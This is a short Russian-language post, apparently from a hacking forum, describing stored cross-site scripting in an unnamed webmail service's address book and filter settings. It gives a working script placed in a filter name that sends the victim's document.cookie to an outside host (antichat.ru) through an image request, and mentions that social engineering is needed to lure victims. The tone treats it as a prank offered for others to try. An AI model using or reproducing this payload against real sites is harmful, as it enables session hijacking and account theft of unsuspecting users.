Заходим в адресную книгу и забиваем доволи знакомый скрипт алерта в поле для имени, домашнего телефона и места работы. При просмотре списка контактов Xss идёт в работу. Хотя больше чем алерт я оттуда не выжал =( Да и без соцИнж не обойтись =( Короче - шалость такая =)



А при создании нового фильтра в названии вбиваем любимый
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> И ловим кукисы... =) И опять тут без соц инженерии никуда =)